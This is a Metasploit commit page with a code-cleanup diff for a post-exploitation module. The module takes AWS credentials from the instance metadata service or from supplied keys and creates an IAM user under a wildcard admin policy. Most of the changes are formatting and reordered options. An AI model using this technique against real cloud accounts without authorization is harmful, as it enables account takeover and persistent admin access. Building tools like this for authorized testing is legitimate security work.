Merge pull request #1 from jhart-r7/pr/fixup-7604

Initial cleanup for #7604
2016-12-06 22:03:25 -08:00 · 2016-12-06 22:03:25 -08:00 · 48c9e7dfd5
parent 497e02955b 1c3f0437ed
commit 48c9e7dfd5
2 changed files with 40 additions and 31 deletions
--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@ -6,6 +6,7 @@ module Metasploit
      module Client
        USER_AGENT = "aws-sdk-ruby2/2.6.27 ruby/2.3.2 x86_64-darwin15"
        include Msf::Exploit::Remote::HttpClient
+
        # because Post modules require these to be defined when including HttpClient
        def register_autofilter_ports(ports=[]); end
        def register_autofilter_hosts(ports=[]); end
@ -48,7 +49,7 @@ module Metasploit
          if headers.nil? || !headers.instance_of?(Hash) || body_digest.nil? || !body_digest.instance_of?(String)
            return nil, nil
          end
-          headers_block = headers.sort_by(&:first).map do |k,v|
+          headers_block = headers.sort_by(&:first).map do |k, v|
            v = "#{v},#{v}" if k == 'Host'
            "#{k.downcase}:#{v}"
          end.join("\n")
@ -76,8 +77,8 @@ module Metasploit

        def body(vars_post)
          pstr = ""
-          vars_post.each_pair do |var,val|
-            pstr << '&' if pstr.length > 0
+          vars_post.each_pair do |var, val|
+            pstr << '&' unless pstr.empty?
            pstr << var
            pstr << '='
            pstr << val
@ -106,7 +107,7 @@ module Metasploit
        def print_hsh(hsh)
          return if hsh.nil? || !hsh.instance_of?(Hash)
          hsh.each do |key, value|
-            print_warning "#{key}: #{value}"
+            vprint_status "#{key}: #{value}"
          end
        end

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@ -1,3 +1,8 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
 require 'msf/core'
 require 'metasploit/framework/aws/client'

@ -5,42 +10,46 @@ class MetasploitModule < Msf::Post

  include Metasploit::Framework::Aws::Client

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Create an AWS IAM User",
-      'Description'    => %q{
-        This module will attempt to create an AWS (Amazon Web Services) IAM
-        (Identity and Access Management) user with Admin privileges.
-      },
-      'License'        => MSF_LICENSE,
-      'Platform'      => %w(unix),
-      'SessionTypes'  => %w(shell meterpreter),
-      'Author'         => ['Javier Godinez <godinezj[at]gmail.com>'],
-      'References'     => [
-        [ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
-      ]
-    ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "Create an AWS IAM User",
+        'Description'    => %q{
+          This module will attempt to create an AWS (Amazon Web Services) IAM
+          (Identity and Access Management) user with Admin privileges.
+        },
+        'License'        => MSF_LICENSE,
+        'Platform'       => %w(unix),
+        'SessionTypes'   => %w(shell meterpreter),
+        'Author'         => ['Javier Godinez <godinezj[at]gmail.com>'],
+        'References'     => [
+          [ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
+        ]
+      )
+    )

    register_options(
      [
+        OptString.new('IAM_USERNAME', [false, 'Name of the user to be created (leave empty or unset to use a random name)', '']),
+        OptString.new('AccessKeyId', [false, 'AWS access key', '']),
+        OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
+        OptString.new('Token', [false, 'AWS session token', ''])
+      ]
+    )
+    register_advanced_options(
+      [
+        OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
        OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
        OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
        OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
        OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
-        OptString.new('IAM_USERNAME', [false, 'Username for the user to be created', '']),
        OptString.new('Region', [true, 'The default region', 'us-east-1' ])
-      ])
-    register_advanced_options(
-      [
-        OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
-        OptString.new('AccessKeyId', [false, 'AWS access key', '']),
-        OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
-        OptString.new('Token', [false, 'AWS session token', ''])
-      ])
+      ]
+    )
    deregister_options('VHOST')
  end

-
  def run
    # setup creds for making IAM API calls
    creds = metadata_creds
@ -58,7 +67,7 @@ class MetasploitModule < Msf::Post
    end

    # create user
-    username = datastore['IAM_USERNAME'].empty? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
+    username = datastore['IAM_USERNAME'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
    print_status("Creating user: #{username}")
    action = 'CreateUser'
    doc = call_iam(creds, 'Action' => action, 'UserName' => username)
@ -119,4 +128,3 @@ class MetasploitModule < Msf::Post
    {}
  end
 end
-